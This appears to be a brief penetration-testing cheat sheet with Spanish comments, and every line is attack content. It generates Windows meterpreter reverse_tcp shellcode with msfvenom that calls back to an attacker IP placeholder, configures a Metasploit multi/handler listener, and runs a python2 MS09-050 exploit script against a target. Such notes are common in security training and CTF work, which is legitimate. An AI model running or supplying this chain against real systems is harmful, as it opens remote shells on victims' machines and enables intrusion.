# Generación de shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> EXITFUNC=thread -f python --var-name shell
# Configuración de listener (multi/handler) de reverse shell
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-port>
run -j
# Exploit
python2 ms09-050.py <target>